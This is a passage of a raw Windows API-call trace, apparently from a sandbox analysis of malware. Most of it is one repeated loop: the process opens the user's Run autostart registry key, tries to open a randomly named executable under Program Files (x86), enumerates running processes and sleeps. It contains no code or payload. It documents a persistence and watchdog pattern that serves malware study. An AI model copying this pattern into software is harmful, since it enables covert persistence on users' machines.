KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0301.829] NtClose (Handle=0x338) returned 0x0 [0301.829] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.829] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.829] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0301.829] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.829] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.829] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0301.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0301.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0301.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0301.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0301.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0301.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0301.950] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0301.951] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0301.953] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0301.953] NtClose (Handle=0x338) returned 0x0 [0301.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.953] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.954] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0301.954] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.954] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.954] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0301.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0301.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0301.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0301.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0301.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0302.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0302.112] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0302.114] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0302.115] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0302.115] NtClose (Handle=0x338) returned 0x0 [0302.115] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.115] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.115] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0302.115] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.116] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.116] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0302.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0302.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0302.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0302.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0302.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0302.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0302.253] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0302.254] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0302.255] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0302.255] NtClose (Handle=0x338) returned 0x0 [0302.255] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.255] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.255] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0302.255] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.255] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.255] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0302.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0302.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0302.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0302.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0302.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0302.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0302.364] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0302.365] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0302.366] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0302.366] NtClose (Handle=0x338) returned 0x0 [0302.367] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.367] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.367] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0302.367] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.367] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.367] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0302.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0302.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0302.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0302.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0302.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0302.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0302.496] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0302.505] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0302.506] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0302.506] NtClose (Handle=0x338) returned 0x0 [0302.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.506] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.506] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0302.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.507] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.507] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0302.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0302.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0302.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0302.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0302.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0302.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0302.685] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0302.686] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0302.687] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0302.687] NtClose (Handle=0x338) returned 0x0 [0302.687] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.687] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.687] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0302.687] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.687] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.687] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0302.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, 